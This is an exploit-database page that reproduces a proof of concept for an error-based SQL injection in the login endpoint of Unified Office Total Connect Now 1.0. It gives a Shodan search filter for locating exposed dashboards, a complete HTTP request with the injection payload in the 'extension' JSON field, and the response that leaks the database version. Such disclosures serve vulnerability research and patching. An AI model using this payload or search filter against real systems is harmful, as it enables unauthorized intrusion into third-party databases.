Advertisement






Unified Office Total Connect Now 1.0 SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2021-06-22
CVSS EPSS EPSSP
Not provided 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060128

Below is a copy:

Unified Office Total Connect Now 1.0 SQL Injection
# Exploit Title: Unified Office Total Connect Now 1.0  'data' SQL Injection
# Shodan Filter: http.title:"TCN User Dashboard"
# Date: 06-16-2021
# Exploit Author: Ajaikumar Nadar
# Vendor Homepage: https://unifiedoffice.com/
# Software Link: https://unifiedoffice.com/voip-business-solutions/
# Version: 1.0
# Tested on: CentOS + Apache/2.2.15

POC:
1. Go to url http://localhost/operator/operatorLogin.php and login
2. Capture the request in Burpsuite and use the payload as given below.
3. Observe the response which reveals the DB version of mysql.

Request:

POST /operator/operatorLogin.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 178
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/operator/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81

data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}


Response:

HTTP/1.1 400 Bad Request
Date: Wed, 16 Jun 2021 12:49:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8

Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum